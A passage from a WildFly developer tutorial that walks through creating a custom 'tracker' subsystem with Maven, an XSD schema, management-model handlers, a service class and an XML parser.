subsystems.\n\n[source,options=\"nowrap\"]\n----\nmvn archetype:generate \\\n -DarchetypeArtifactId=wildfly-subsystem \\\n -DarchetypeGroupId=org.wildfly.archetypes \\\n -DarchetypeVersion=8.0.0.Final \\\n -DarchetypeRepository=https:\/\/repository.jboss.org\/nexus\/content\/groups\/public\n----\n\nMaven will download the archetype and it's dependencies, and ask you\nsome questions:\n\n[source,options=\"nowrap\"]\n----\n$ mvn archetype:generate \\\n -DarchetypeArtifactId=wildfly-subsystem \\\n -DarchetypeGroupId=org.wildfly.archetypes \\\n -DarchetypeVersion=8.0.0.Final \\\n -DarchetypeRepository=https:\/\/repository.jboss.org\/nexus\/content\/groups\/public\n[INFO] Scanning for projects...\n[INFO]\n[INFO] ------------------------------------------------------------------------\n[INFO] Building Maven Stub Project (No POM) 1\n[INFO] ------------------------------------------------------------------------\n[INFO]\n\u00a0\n.........\n\u00a0\nDefine value for property 'groupId': : com.acme.corp\nDefine value for property 'artifactId': : acme-subsystem\nDefine value for property 'version': 1.0-SNAPSHOT: :\nDefine value for property 'package': com.acme.corp: : com.acme.corp.tracker\nDefine value for property 'module': : com.acme.corp.tracker\n[INFO] Using property: name = WildFly subsystem project\nConfirm properties configuration:\ngroupId: com.acme.corp\nartifactId: acme-subsystem\nversion: 1.0-SNAPSHOT\npackage: com.acme.corp.tracker\nmodule: com.acme.corp.tracker\nname: WildFly subsystem project\n Y: : Y\n[INFO] ------------------------------------------------------------------------\n[INFO] BUILD SUCCESS\n[INFO] ------------------------------------------------------------------------\n[INFO] Total time: 1:42.563s\n[INFO] Finished at: Fri Jul 08 14:30:09 BST 2011\n[INFO] Final Memory: 7M\/81M\n[INFO] ------------------------------------------------------------------------\n$\n----\n\n[cols=\",\",options=\"header\"]\n|=======================================================================\n| |Instruction\n\n|1 |Enter the groupId you wish to use\n\n|2 |Enter the artifactId you wish to use\n\n|3 |Enter the version you wish to use, or just hit Enter if you wish to\naccept the default 1.0-SNAPSHOT\n\n|4 |Enter the java package you wish to use, or just hit Enter if you\nwish to accept the default (which is copied from groupId ).\n\n|5 |Enter the module name you wish to use for your extension.\n\n|6 |Finally, if you are happy with your choices, hit Enter and Maven\nwill generate the project for you.\n|=======================================================================\n\nWe now have a skeleton project that you can use to\nimplement a subsystem. Import the \ufeff `acme-subsystem` project into your\nfavourite IDE. A nice side-effect of running this in the IDE is that you\ncan see the javadoc of WildFly classes and interfaces imported by the\nskeleton code. If you do a `mvn install` in the project it will work if\nwe plug it into WildFly, but before doing that we will change it to do\nsomething more useful.\n\nThe rest of this section modifies the skeleton project created by the\narchetype to do something more useful, and the full code can be found in\nlink:downloads\/acme-subsystem.zip[acme-subsystem.zip].\n\nIf you do a `mvn install` in the created project, you will see some\ntests being run\n\n[source,options=\"nowrap\"]\n----\n$mvn install\n[INFO] Scanning for projects...\n[...]\n[INFO] Surefire report directory: \/Users\/kabir\/sourcecontrol\/temp\/archetype-test\/acme-subsystem\/target\/surefire-reports\n\u00a0\n-------------------------------------------------------\n T E S T S\n-------------------------------------------------------\nRunning com.acme.corp.tracker.extension.SubsystemBaseParsingTestCase\nTests run: 1, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0.424 sec\nRunning com.acme.corp.tracker.extension.SubsystemParsingTestCase\nTests run: 6, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0.074 sec\n\u00a0\nResults :\n\u00a0\nTests run: 3, Failures: 0, Errors: 0, Skipped: 0\n[...]\n----\n\nWe will talk about these later in the\n<<testing-the-parsers,#Testing the\nparsers>> section.\n\n[[create-the-schema]]\n== Create the schema\n\nFirst, let us define the schema for our subsystem. Rename\n`src\/main\/resources\/schema\/mysubsystem.xsd` to\n`src\/main\/resources\/schema\/acme.xsd`. Then open `acme.xsd` and modify it\nto the following\n\n[source,xml,options=\"nowrap\"]\n----\n<xs:schema xmlns:xs=\"http:\/\/www.w3.org\/2001\/XMLSchema\"\n targetNamespace=\"urn:com.acme.corp.tracker:1.0\"\n xmlns=\"urn:com.acme.corp.tracker:1.0\"\n elementFormDefault=\"qualified\"\n attributeFormDefault=\"unqualified\"\n version=\"1.0\">\n\u00a0\n <!-- The subsystem root element -->\n <xs:element name=\"subsystem\" type=\"subsystemType\"\/>\n <xs:complexType name=\"subsystemType\">\n <xs:all>\n <xs:element name=\"deployment-types\" type=\"deployment-typesType\"\/>\n <\/xs:all>\n <\/xs:complexType>\n <xs:complexType name=\"deployment-typesType\">\n <xs:choice minOccurs=\"0\" maxOccurs=\"unbounded\">\n <xs:element name=\"deployment-type\" type=\"deployment-typeType\"\/>\n <\/xs:choice>\n <\/xs:complexType>\n <xs:complexType name=\"deployment-typeType\">\n <xs:attribute name=\"suffix\" use=\"required\"\/>\n <xs:attribute name=\"tick\" type=\"xs:long\" use=\"optional\" default=\"10000\"\/>\n <\/xs:complexType>\n<\/xs:schema>\n----\n\nNote that we modified the `xmlns` and `targetNamespace` values to \ufeff\n`urn.com.acme.corp.tracker:1.0`. Our new `subsystem` element has a child\ncalled `deployment-types`, which in turn can have zero or more children\ncalled `deployment-type`. Each `deployment-type` has a required `suffix`\nattribute, and a `tick` attribute which defaults to `true.`\n\nNow modify the \ufeff `com.acme.corp.tracker.extension.SubsystemExtension`\nclass to contain the new namespace.\n\n[source,java,options=\"nowrap\"]\n----\npublic class SubsystemExtension implements Extension {\n\u00a0\n \/** The name space used for the {@code substystem} element *\/\n public static final String NAMESPACE = \"urn:com.acme.corp.tracker:1.0\";\n ...\n----\n\n[[design-and-define-the-model-structure]]\n== Design and define the model structure\n\nThe following example xml contains a valid subsystem configuration, we\nwill see how to plug this in to WildFly later in this tutorial.\n\n[source,xml,options=\"nowrap\"]\n----\n<subsystem xmlns=\"urn:com.acme.corp.tracker:1.0\">\n <deployment-types>\n <deployment-type suffix=\"sar\" tick=\"10000\"\/>\n <deployment-type suffix=\"war\" tick=\"10000\"\/>\n <\/deployment-types>\n<\/subsystem>\n----\n\nNow when designing our model, we can either do a one to one mapping\nbetween the schema and the model or come up with something slightly or\nvery different. To keep things simple, let us stay pretty true to the\nschema so that when executing a `:read-resource(recursive=true)` against\nour subsystem we'll see something like:\n\n[source,options=\"nowrap\"]\n----\n{\n \"outcome\" => \"success\",\n \"result\" => {\"type\" => {\n \"sar\" => {\"tick\" => \"10000\"},\n \"war\" => {\"tick\" => \"10000\"}\n }}\n}\n----\n\nEach `deployment-type` in the xml becomes in the model a child resource\nof the subsystem's root resource. The child resource's child-type is\n`type`, and it is indexed by its `suffix`. Each `type` resource then\ncontains the `tick` attribute.\n\nWe also need a name for our subsystem, to do that change\n`com.acme.corp.tracker.extension.SubsystemExtension`:\n\n[source,java,options=\"nowrap\"]\n----\npublic class SubsystemExtension implements Extension {\n ...\n \/** The name of our subsystem within the model. *\/\n public static final String SUBSYSTEM_NAME = \"tracker\";\n ...\n----\n\nOnce we are finished our subsystem will be available under\n`\/subsystem=tracker`.\n\nThe `SubsystemExtension.initialize()` method defines the model,\ncurrently it sets up the basics to add our subsystem to the model:\n\n[source,java,options=\"nowrap\"]\n----\n@Override\n public void initialize(ExtensionContext context) {\n \/\/register subsystem with its model version\n\u00a0 final SubsystemRegistration subsystem = context.registerSubsystem(SUBSYSTEM_NAME, 1, 0);\n \/\/register subsystem model with subsystem definition that defines all attributes and operations\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 final ManagementResourceRegistration registration = subsystem.registerSubsystemModel(SubsystemDefinition.INSTANCE);\n \/\/register describe operation, note that this can be also registered in SubsystemDefinition\n registration.registerOperationHandler(DESCRIBE, GenericSubsystemDescribeHandler.INSTANCE, GenericSubsystemDescribeHandler.INSTANCE, false, OperationEntry.EntryType.PRIVATE);\n\u00a0 \/\/we can register additional submodels here\n \/\/\n subsystem.registerXMLElementWriter(parser);\n }\n----\n\nThe `registerSubsystem()` call registers our subsystem with the\nextension context. At the end of the method we register our parser with\nthe returned `SubsystemRegistration` to be able to marshal our\nsubsystem's model back to the main configuration file when it is\nmodified. We will add more functionality to this method later.\n\n[[registering-the-core-subsystem-model]]\n=== Registering the core subsystem model\n\nNext we obtain a `ManagementResourceRegistration` by registering the\nsubsystem model. This is a *compulsory* step for every new subsystem.\n\n[source,java,options=\"nowrap\"]\n----\nfinal ManagementResourceRegistration registration = subsystem.registerSubsystemModel(SubsystemDefinition.INSTANCE);\n----\n\nIts parameter is an implementation of the `ResourceDefinition`\ninterface, which means that when you call\n`\/subsystem=tracker:read-resource-description` the information you see\ncomes from model that is defined by `SubsystemDefinition.INSTANCE`.\n\n[source,java,options=\"nowrap\"]\n----\npublic class SubsystemDefinition extends SimpleResourceDefinition {\n\u00a0\u00a0\u00a0 public static final SubsystemDefinition INSTANCE = new SubsystemDefinition();\n\u00a0\n\u00a0\u00a0\u00a0 private SubsystemDefinition() {\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 super(SubsystemExtension.SUBSYSTEM_PATH,\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 SubsystemExtension.getResourceDescriptionResolver(null),\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 \/\/We always need to add an 'add' operation\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 SubsystemAdd.INSTANCE,\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 \/\/Every resource that is added, normally needs a remove operation\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 SubsystemRemove.INSTANCE);\n\u00a0\u00a0\u00a0 }\n\u00a0\n\u00a0\u00a0\u00a0 @Override\n\u00a0\u00a0\u00a0 public void registerOperations(ManagementResourceRegistration resourceRegistration) {\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 super.registerOperations(resourceRegistration);\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 \/\/you can register aditional operations here\n\u00a0\u00a0\u00a0 }\n\u00a0\n\u00a0\u00a0\u00a0 @Override\n\u00a0\u00a0\u00a0 public void registerAttributes(ManagementResourceRegistration resourceRegistration) {\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 \/\/you can register attributes here\n\u00a0\u00a0\u00a0 }\n}\n----\n\nSince we need child resource `type` we need to add new\nResourceDefinition,\n\nThe `ManagementResourceRegistration` obtained in\n`SubsystemExtension.initialize()` is then used to add additional\noperations or to register submodels to the `\/subsystem=tracker` address.\nEvery subsystem and resource *must* have an `ADD` method which can be\nachieved by the following line inside `registerOperations` in your\n`ResourceDefinition` or by providing it in constructor of your\n`SimpleResourceDefinition` just as we did in example above.\n\n[source,java,options=\"nowrap\"]\n----\n\/\/We always need to add an 'add' operation\n resourceRegistration.registerOperationHandler(ADD, SubsystemAdd.INSTANCE, new DefaultResourceAddDescriptionProvider(resourceRegistration,descriptionResolver), false);\n----\n\nThe parameters when registering an operation handler are:\n\n1. *The name* - i.e. `ADD`.\n2. The handler instance - we will talk more about this below\n3. The handler description provider - we will talk more about this\nbelow.\n4. Whether this operation handler is inherited - `false` means that\nthis operation is not inherited, and will only apply to\n`\/subsystem=tracker`. The content for this operation handler will be\nprovided by `3`.\n\nLet us first look at the description provider which is quite simple\nsince this operation takes no parameters. The addition of `type`\nchildren will be handled by another operation handler, as we will see\nlater on.\n\nThere are two way to define `DescriptionProvider`, one is by defining it\nby hand using ModelNode, but as this has show to be very error prone\nthere are lots of helper methods to help you automatically describe the\nmodel. Following example is done by manually defining Description\nprovider for ADD operation handler\n\n[source,java,options=\"nowrap\"]\n----\n\/**\n * Used to create the description of the subsystem add method\n *\/\n public static DescriptionProvider SUBSYSTEM_ADD = new DescriptionProvider() {\n public ModelNode getModelDescription(Locale locale) {\n \/\/The locale is passed in so you can internationalize the strings used in the descriptions\n\u00a0\n final ModelNode subsystem = new ModelNode();\n subsystem.get(OPERATION_NAME).set(ADD);\n subsystem.get(DESCRIPTION).set(\"Adds the tracker subsystem\");\n\u00a0\n return subsystem;\n }\n };\n----\n\nOr you can use API that helps you do that for you. For Add and Remove\nmethods there are classes `DefaultResourceAddDescriptionProvider` and\n`DefaultResourceRemoveDescriptionProvider` that do work for you. In case\nyou use `SimpleResourceDefinition` even that part is hidden from you.\n\n[source,java,options=\"nowrap\"]\n----\nresourceRegistration.registerOperationHandler(ADD, SubsystemAdd.INSTANCE, new DefaultResourceAddDescriptionProvider(resourceRegistration,descriptionResolver), false);\nresourceRegistration.registerOperationHandler(REMOVE, SubsystemRemove.INSTANCE, new DefaultResourceRemoveDescriptionProvider(resourceRegistration,descriptionResolver), false);\n----\n\nFor other operation handlers that are not add\/remove you can use\n`DefaultOperationDescriptionProvider` that takes additional parameter of\nwhat is the name of operation and optional array of\nparameters\/attributes operation takes. This is an example to register\noperation \" `add-mime`\" with two parameters:\n\n[source,java,options=\"nowrap\"]\n----\ncontainer.registerOperationHandler(\"add-mime\",\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 MimeMappingAdd.INSTANCE,\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 new DefaultOperationDescriptionProvider(\"add-mime\", Extension.getResourceDescriptionResolver(\"container.mime-mapping\"), MIME_NAME, MIME_VALUE));\n----\n\n[NOTE]\n\nWhen descriping an operation its description provider's `OPERATION_NAME`\nmust match the name used when calling\n`ManagementResourceRegistration.registerOperationHandler()`\n\nNext we have the actual operation handler instance, note that we have\nchanged its `populateModel()` method to initialize the `type` child of\nthe model.\n\n[source,java,options=\"nowrap\"]\n----\nclass SubsystemAdd extends AbstractBoottimeAddStepHandler {\n\u00a0\n static final SubsystemAdd INSTANCE = new SubsystemAdd();\n\u00a0\n private SubsystemAdd() {\n }\n\u00a0\n \/** {@inheritDoc} *\/\n @Override\n protected void populateModel(ModelNode operation, ModelNode model) throws OperationFailedException {\n log.info(\"Populating the model\");\n \/\/Initialize the 'type' child node\n model.get(\"type\").setEmptyObject();\n }\n ....\n----\n\n`SubsystemAdd` also has a `performBoottime()` method which is used for\ninitializing the deployer chain associated with this subsystem. We will\ntalk about the deployers later on. However, the basic idea for all\noperation handlers is that we do any model updates before changing the\nactual runtime state.\n\nThe rule of thumb is that every thing that can be added, can also be\nremoved so we have a remove handler for the subsystem registered +\nin `SubsystemDefinition.registerOperations` or just provide the\noperation handler in constructor.\n\n[source,java,options=\"nowrap\"]\n----\n\/\/Every resource that is added, normally needs a remove operation\n registration.registerOperationHandler(REMOVE, SubsystemRemove.INSTANCE, DefaultResourceRemoveDescriptionProvider(resourceRegistration,descriptionResolver) , false);\n----\n\n`SubsystemRemove` extends `AbstractRemoveStepHandler` which takes care\nof removing the resource from the model so we don't need to override its\n`performRemove()` operation, also the add handler did not install any\nservices (services will be discussed later) so we can delete the\n`performRuntime()` method generated by the archetype.\n\n[source,java,options=\"nowrap\"]\n----\nclass SubsystemRemove extends AbstractRemoveStepHandler {\n\u00a0\n static final SubsystemRemove INSTANCE = new SubsystemRemove();\n\u00a0\n private final Logger log = Logger.getLogger(SubsystemRemove.class);\n\u00a0\n private SubsystemRemove() {\n }\n}\n----\n\nThe description provider for the remove operation is simple and quite\nsimilar to that of the add handler where just name of the method\nchanges.\n\n[[registering-the-subsystem-child]]\n=== Registering the subsystem child\n\nThe `type` child does not exist in our skeleton project so we need to\nimplement the operations to add and remove them from the model.\n\nFirst we need an add operation to add the `type` child, create a class\ncalled `com.acme.corp.tracker.extension.TypeAddHandler`. In this case we\nextend the `org.jboss.as.controller.AbstractAddStepHandler` class and\nimplement the `org.jboss.as.controller.descriptions.DescriptionProvider`\ninterface. `org.jboss.as.controller.OperationStepHandler` is the main\ninterface for the operation handlers, and `AbstractAddStepHandler` is an\nimplementation of that which does the plumbing work for adding a\nresource to the model.\n\n[source,java,options=\"nowrap\"]\n----\nclass TypeAddHandler extends AbstractAddStepHandler implements DescriptionProvider {\n\u00a0\n public static final TypeAddHandler INSTANCE = new TypeAddHandler();\n\u00a0\n private TypeAddHandler() {\n }\n----\n\nThen we define subsystem model. Lets call it `TypeDefinition` and for\nease of use let it extend `SimpleResourceDefinition` instead just\nimplement `ResourceDefinition`.\n\n[source,java,options=\"nowrap\"]\n----\npublic class TypeDefinition extends SimpleResourceDefinition {\n\u00a0\n\u00a0public static final TypeDefinition INSTANCE = new TypeDefinition();\n\u00a0\n\u00a0\/\/we define attribute named tick\nprotected static final SimpleAttributeDefinition TICK =\nnew SimpleAttributeDefinitionBuilder(TrackerExtension.TICK, ModelType.LONG)\n .setAllowExpression(true)\n .setXmlName(TrackerExtension.TICK)\n .setFlags(AttributeAccess.Flag.RESTART_ALL_SERVICES)\n .setDefaultValue(new ModelNode(1000))\n .setAllowNull(false)\n .build();\n\u00a0\nprivate TypeDefinition(){\n\u00a0 super(TYPE_PATH, TrackerExtension.getResourceDescriptionResolver(TYPE),TypeAdd.INSTANCE,TypeRemove.INSTANCE);\n}\n\u00a0\n@Override\npublic void registerAttributes(ManagementResourceRegistration resourceRegistration){\n resourceRegistration.registerReadWriteAttribute(TICK, null, TrackerTickHandler.INSTANCE);\n}\n\u00a0\n}\n----\n\nWhich will take care of describing the model for us. As you can see in\nexample above we define `SimpleAttributeDefinition` named `TICK`, this\nis a mechanism to define Attributes in more type safe way and to add\nmore common API to manipulate attributes. As you can see here we define\ndefault value of 1000 as also other constraints and capabilities. There\ncould be other properties set such as validators, alternate names, xml\nname, flags for marking it attribute allows expressions and more.\n\nThen we do the work of updating the model by implementing the\n`populateModel()` method from the `AbstractAddStepHandler`, which\npopulates the model's attribute from the operation parameters. First we\nget hold of the model relative to the address of this operation (we will\nsee later that we will register it against `\/subsystem=tracker\/type=*`),\nso we just specify an empty relative address, and we then populate our\nmodel with the parameters from the operation. There is operation\n`validateAndSet` on `AttributeDefinition` that helps us validate and set\nthe model based on definition of the attribute.\n\n[source,java,options=\"nowrap\"]\n----\n@Override\n protected void populateModel(ModelNode operation, ModelNode model) throws OperationFailedException {\n TICK.validateAndSet(operation,model);\n }\n----\n\nWe then override the `performRuntime()` method to perform our runtime\nchanges, which in this case involves installing a service into the\ncontroller at the heart of WildFly. (\n`AbstractAddStepHandler.performRuntime()` is similar to\n`AbstractBoottimeAddStepHandler.performBoottime()` in that the model is\nupdated before runtime changes are made.\n\n[source,java,options=\"nowrap\"]\n----\n@Override\n protected void performRuntime(OperationContext context, ModelNode operation, ModelNode model,\n ServiceVerificationHandler verificationHandler, List<ServiceController<?>> newControllers)\n throws OperationFailedException {\n String suffix = PathAddress.pathAddress(operation.get(ModelDescriptionConstants.ADDRESS)).getLastElement().getValue();\n long tick = TICK.resolveModelAttribute(context,model).asLong();\n TrackerService service = new TrackerService(suffix, tick);\n ServiceName name = TrackerService.createServiceName(suffix);\n ServiceController<TrackerService> controller = context.getServiceTarget()\n .addService(name, service)\n .addListener(verificationHandler)\n .setInitialMode(Mode.ACTIVE)\n .install();\n newControllers.add(controller);\n }\n}\n----\n\nSince the add methods will be of the format\n`\/subsystem=tracker\/suffix=war:add(tick=1234)`, we look for the last\nelement of the operation address, which is `war` in the example just\ngiven and use that as our suffix. We then create an instance of\nTrackerService and install that into the `service target` of the context\nand add the created `service controller` to the `newControllers` list.\n\nThe tracker service is quite simple. All services installed into WildFly\nmust implement the `org.jboss.msc.service.Service` interface.\n\n[source,java,options=\"nowrap\"]\n----\npublic class TrackerService implements Service<TrackerService>{\n----\n\nWe then have some fields to keep the tick count and a thread which when\nrun outputs all the deployments registered with our service.\n\n[source,java,options=\"nowrap\"]\n----\nprivate AtomicLong tick = new AtomicLong(10000);\n\u00a0\n private Set<String> deployments = Collections.synchronizedSet(new HashSet<String>());\n private Set<String> coolDeployments = Collections.synchronizedSet(new HashSet<String>());\n private final String suffix;\n\u00a0\n private Thread OUTPUT = new Thread() {\n @Override\n public void run() {\n while (true) {\n try {\n Thread.sleep(tick.get());\n System.out.println(\"Current deployments deployed while \" + suffix + \" tracking active:\\n\" + deployments\n + \"\\nCool: \" + coolDeployments.size());\n } catch (InterruptedException e) {\n interrupted();\n break;\n }\n }\n }\n };\n\u00a0\n public TrackerService(String suffix, long tick) {\n this.suffix = suffix;\n this.tick.set(tick);\n }\n----\n\nNext we have three methods which come from the `Service` interface.\n`getValue()` returns this service, `start()` is called when the service\nis started by the controller, `stop` is called when the service is\nstopped by the controller, and they start and stop the thread outputting\nthe deployments.\n\n[source,java,options=\"nowrap\"]\n----\n@Override\n public TrackerService getValue() throws IllegalStateException, IllegalArgumentException {\n return this;\n }\n\u00a0\n @Override\n public void start(StartContext context) throws StartException {\n OUTPUT.start();\n }\n\u00a0\n @Override\n public void stop(StopContext context) {\n OUTPUT.interrupt();\n }\n----\n\nNext we have a utility method to create the `ServiceName` which is used\nto register the service in the controller.\n\n[source,java,options=\"nowrap\"]\n----\npublic static ServiceName createServiceName(String suffix) {\n return ServiceName.JBOSS.append(\"tracker\", suffix);\n}\n----\n\nFinally we have some methods to add and remove deployments, and to set\nand read the `tick`. The 'cool' deployments will be explained later.\n\n[source,java,options=\"nowrap\"]\n----\npublic void addDeployment(String name) {\n deployments.add(name);\n }\n\u00a0\n public void addCoolDeployment(String name) {\n coolDeployments.add(name);\n }\n\u00a0\n public void removeDeployment(String name) {\n deployments.remove(name);\n coolDeployments.remove(name);\n }\n\u00a0\n void setTick(long tick) {\n this.tick.set(tick);\n }\n\u00a0\n public long getTick() {\n return this.tick.get();\n }\n}\/\/TrackerService - end\n----\n\nSince we are able to add `type` children, we need a way to be able to\nremove them, so we create a\n`com.acme.corp.tracker.extension.TypeRemoveHandler`. In this case we\nextend `AbstractRemoveStepHandler` which takes care of removing the\nresource from the model so we don't need to override its\n`performRemove()` operationa. But we need to implement the\n`DescriptionProvider` method to provide the model description, and since\nthe add handler installs the TrackerService, we need to remove that in\nthe `performRuntime()` method.\n\n[source,java,options=\"nowrap\"]\n----\npublic class TypeRemoveHandler extends AbstractRemoveStepHandler {\n\u00a0\n public static final TypeRemoveHandler INSTANCE = new TypeRemoveHandler();\n\u00a0\n private TypeRemoveHandler() {\n }\n\u00a0\n\u00a0\n @Override\n protected void performRuntime(OperationContext context, ModelNode operation, ModelNode model) throws OperationFailedException {\n String suffix = PathAddress.pathAddress(operation.get(ModelDescriptionConstants.ADDRESS)).getLastElement().getValue();\n ServiceName name = TrackerService.createServiceName(suffix);\n context.removeService(name);\n }\n\u00a0\n}\n----\n\nWe then need a description provider for the `type` part of the model\nitself, so we modify TypeDefinitnion to registerAttribute\n\n[source,java,options=\"nowrap\"]\n----\nclass TypeDefinition{\n...\n@Override\npublic void registerAttributes(ManagementResourceRegistration resourceRegistration){\n resourceRegistration.registerReadWriteAttribute(TICK, null, TrackerTickHandler.INSTANCE);\n}\n\u00a0\n}\n----\n\nThen finally we need to specify that our new `type` child and associated\nhandlers go under `\/subsystem=tracker\/type=*` in the model by adding\nregistering it with the model in `SubsystemExtension.initialize()`. So\nwe add the following just before the end of the method.\n\n[source,java,options=\"nowrap\"]\n----\n@Override\npublic void initialize(ExtensionContext context)\n{\n final SubsystemRegistration subsystem = context.registerSubsystem(SUBSYSTEM_NAME, 1, 0);\n final ManagementResourceRegistration registration = subsystem.registerSubsystemModel(TrackerSubsystemDefinition.INSTANCE);\n \/\/Add the type child\n ManagementResourceRegistration typeChild = registration.registerSubModel(TypeDefinition.INSTANCE);\n subsystem.registerXMLElementWriter(parser);\n}\n----\n\nThe above first creates a child of our main subsystem registration for\nthe relative address `type=*`, and gets the `typeChild` registration. +\nTo this we add the `TypeAddHandler` and `TypeRemoveHandler`. +\nThe add variety is added under the name `add` and the remove handler\nunder the name `remove`, and for each registered operation handler we\nuse the handler singleton instance as both the handler parameter and as\nthe `DescriptionProvider`.\n\nFinally, we register `tick` as a read\/write attribute, the null\nparameter means we don't do anything special with regards to reading it,\nfor the write handler we supply it with an operation handler called\n`TrackerTickHandler`. +\nRegistering it as a read\/write attribute means we can use the\n`:write-attribute` operation to modify the value of the parameter, and\nit will be handled by `TrackerTickHandler`.\n\nNot registering a write attribute handler makes the attribute read only.\n\n`TrackerTickHandler` extends `AbstractWriteAttributeHandler` +\ndirectly, and so must implement its `applyUpdateToRuntime` and\n`revertUpdateToRuntime` method. +\nThis takes care of model manipulation (validation, setting) but leaves\nus to do just to deal with what we need to do.\n\n[source,java,options=\"nowrap\"]\n----\nclass TrackerTickHandler extends AbstractWriteAttributeHandler<Void> {\n\u00a0\n public static final TrackerTickHandler INSTANCE = new TrackerTickHandler();\n\u00a0\n private TrackerTickHandler() {\n super(TypeDefinition.TICK);\n }\n\u00a0\n protected boolean applyUpdateToRuntime(OperationContext context, ModelNode operation, String attributeName,\n ModelNode resolvedValue, ModelNode currentValue, HandbackHolder<Void> handbackHolder) throws OperationFailedException {\n\u00a0\n modifyTick(context, operation, resolvedValue.asLong());\n\u00a0\n return false;\n }\n\u00a0\n protected void revertUpdateToRuntime(OperationContext context, ModelNode operation, String attributeName, ModelNode valueToRestore, ModelNode valueToRevert, Void handback){\n modifyTick(context, operation, valueToRestore.asLong());\n }\n\u00a0\n private void modifyTick(OperationContext context, ModelNode operation, long value) throws OperationFailedException {\n\u00a0\n final String suffix = PathAddress.pathAddress(operation.get(ModelDescriptionConstants.ADDRESS)).getLastElement().getValue();\n TrackerService service = (TrackerService) context.getServiceRegistry(true).getRequiredService(TrackerService.createServiceName(suffix)).getValue();\n service.setTick(value);\n }\n\u00a0\n}\n----\n\nThe operation used to execute this will be of the form\n`\/subsystem=tracker\/type=war:write-attribute(name=tick,value=12345`) so\nwe first get the `suffix` from the operation address, and the `tick`\nvalue from the operation parameter's `resolvedValue` parameter, and use\nthat to update the model.\n\nWe then add a new step associated with the `RUNTIME` stage to update the\ntick of the TrackerService for our suffix. This is essential since the\ncall to `context.getServiceRegistry()` will fail unless the step\naccessing it belongs to the `RUNTIME` stage.\n\n[NOTE]\n\nWhen implementing `execute()`, you *must* call `context.completeStep()`\nwhen you are done.\n\n[[parsing-and-marshalling-of-the-subsystem-xml]]\n== Parsing and marshalling of the subsystem xml\n\nWildFly uses the Stax API to parse the xml files. This is initialized in\n`SubsystemExtension` by mapping our parser onto our namespace:\n\n[source,java,options=\"nowrap\"]\n----\npublic class SubsystemExtension implements Extension {\n\u00a0\n \/** The name space used for the {@code subsystem} element *\/\n public static final String NAMESPACE = \"urn:com.acme.corp.tracker:1.0\";\n ...\n protected static final PathElement SUBSYSTEM_PATH = PathElement.pathElement(SUBSYSTEM, SUBSYSTEM_NAME);\n\u00a0\u00a0\u00a0 protected static final PathElement TYPE_PATH = PathElement.pathElement(TYPE);\n\u00a0\n \u00a0\/** The parser used for parsing our subsystem *\/\n private final SubsystemParser parser = new SubsystemParser();\n\u00a0\n \u00a0@Override\n public void initializeParsers(ExtensionParsingContext context) {\n context.setSubsystemXmlMapping(NAMESPACE, parser);\n }\n ...\n----\n\nWe then need to write the parser. The contract is that we read our\nsubsystem's xml and create the operations that will populate the model\nwith the state contained in the xml. These operations will then be\nexecuted on our behalf as part of the parsing process. The entry point\nis the `readElement()` method.\n\n[source,java,options=\"nowrap\"]\n----\npublic class SubsystemExtension implements Extension {\n\u00a0\n \/**\n * The subsystem parser, which uses stax to read and write to and from xml\n *\/\n private static class SubsystemParser implements XMLStreamConstants, XMLElementReader<List<ModelNode>>, XMLElementWriter<SubsystemMarshallingContext> {\n\u00a0\n \/** {@inheritDoc} *\/\n @Override\n public void readElement(XMLExtendedStreamReader reader, List<ModelNode> list) throws XMLStreamException {\n \/\/ Require no attributes\n ParseUtils.requireNoAttributes(reader);\n\u00a0\n \/\/Add the main subsystem 'add' operation\n final ModelNode subsystem = new ModelNode();\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 subsystem.get(OP).set(ADD);\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 subsystem.get(OP_ADDR).set(PathAddress.pathAddress(SUBSYSTEM_PATH).toModelNode());\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 list.add(subsystem);\n\u00a0\n \/\/Read the children\n while (reader.hasNext() && reader.nextTag() != END_ELEMENT) {\n if (!reader.getLocalName().equals(\"deployment-types\")) {\n throw ParseUtils.unexpectedElement(reader);\n }\n while (reader.hasNext() && reader.nextTag() != END_ELEMENT) {\n if (reader.isStartElement()) {\n readDeploymentType(reader, list);\n }\n }\n }\n }\n\u00a0\n private void readDeploymentType(XMLExtendedStreamReader reader, List<ModelNode> list) throws XMLStreamException {\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 if (!reader.getLocalName().equals(\"deployment-type\")) {\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 throw ParseUtils.unexpectedElement(reader);\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 }\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 ModelNode 